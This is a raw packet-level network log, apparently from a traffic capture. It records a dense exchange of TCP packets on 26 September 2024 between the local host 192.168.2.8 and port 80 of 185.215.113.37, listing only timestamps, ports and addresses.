Sep 26, 2024 02:40:17.851079941 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851083040 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851093054 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851099014 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851105928 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851111889 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851120949 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851135969 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851136923 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851155996 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851166964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851175070 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851180077 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851197004 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851205111 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851206064 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851222038 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851223946 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851236105 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851248026 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851249933 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851262093 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851267099 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851279974 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851279974 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851290941 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851300955 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851310968 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851315022 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851351976 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851471901 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851507902 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851507902 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851654053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851666927 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851680994 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851691961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851697922 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851705074 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851706028 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851720095 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851726055 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851732016 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851746082 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851759911 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851771116 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851777077 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851783037 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851802111 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851802111 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851816893 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851896048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851908922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.851932049 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.851949930 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852025032 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852036953 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852047920 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852061033 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852061033 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852087021 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852104902 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852178097 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852190018 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852205038 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852216959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852229118 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852229118 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852231026 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852241039 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852267027 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852267027 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852281094 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852293015 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852298975 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852308035 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852309942 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852320910 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852324009 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852340937 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852355957 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852391958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852406025 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852416039 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852431059 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852443933 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852890968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852902889 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852915049 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.852930069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.852952003 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853013039 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853027105 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853039026 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853050947 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853051901 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853068113 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853077888 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853090048 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853122950 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853135109 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853147984 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853153944 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853157997 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853168964 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853183031 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853194952 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853251934 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853264093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853276968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853286982 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853291988 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853302956 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853317022 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853329897 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.853353024 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.853388071 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.854321003 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.854331970 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.854343891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.854367018 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.854384899 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.854449987 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.854463100 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.854475975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.854552031 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.854564905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.854574919 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.854574919 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.854577065 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.854595900 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.854610920 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941205025 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941225052 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941236973 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941287041 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941303015 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941315889 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941320896 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941329002 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941337109 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941344023 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941356897 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941364050 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941370964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941385031 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941395044 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941396952 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941412926 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941437960 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941453934 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941467047 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941478014 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941488028 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941489935 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941502094 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941517115 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941518068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941531897 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941540956 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941545010 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941556931 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941564083 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941586018 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941586018 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941606045 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941607952 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941622019 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941622019 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941634893 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941646099 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941647053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941658974 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941663027 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941672087 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941684961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941688061 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941696882 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941704035 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941711903 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941724062 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941729069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941749096 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941752911 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941768885 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941783905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941785097 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941795111 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941807032 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941808939 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941819906 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941822052 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941833973 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941837072 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941847086 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941858053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941864967 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941870928 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941874981 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941881895 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941895008 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941905022 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941914082 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941915035 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941926956 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941940069 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941941977 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941951990 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941960096 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941967010 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941979885 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.941983938 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.941992998 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942004919 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942006111 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942020893 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942028999 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942033052 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942054987 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942070007 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942079067 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942104101 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942107916 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942121983 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942135096 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942143917 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942147970 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942162037 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942166090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942166090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942174911 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942182064 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942188025 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942198992 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942202091 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942213058 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942217112 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942224979 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942231894 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942240953 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942244053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942255974 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942259073 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942269087 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942272902 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942281008 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942290068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942301989 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942307949 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942307949 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942316055 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942318916 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942328930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942334890 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942344904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:17.942348003 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942365885 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.942377090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.978255033 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:17.983916998 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203430891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203463078 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203474998 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203490019 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203495979 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203505039 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203505039 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203519106 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203546047 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203546047 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203562021 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203574896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203586102 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203586102 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203612089 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203634977 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203644991 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203656912 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203669071 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203680038 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203684092 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203694105 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203697920 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203706026 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203722000 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203733921 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203793049 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203805923 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203818083 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203828096 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203830004 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203840971 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203846931 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203854084 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203876972 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203896999 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203943014 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203954935 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203967094 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203982115 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.203983068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203996897 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.203999043 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204011917 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204044104 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204070091 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204082012 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204092979 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204111099 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204122066 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204188108 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204202890 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204214096 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204221964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204225063 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204231977 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204243898 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204253912 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204282045 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204371929 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204385042 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204397917 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204406977 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204411983 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204426050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204428911 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204438925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204446077 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204454899 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204468012 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204476118 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:18.204479933 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:18.204490900 CEST	49705	80	192.168.2.8	185.215.113.37
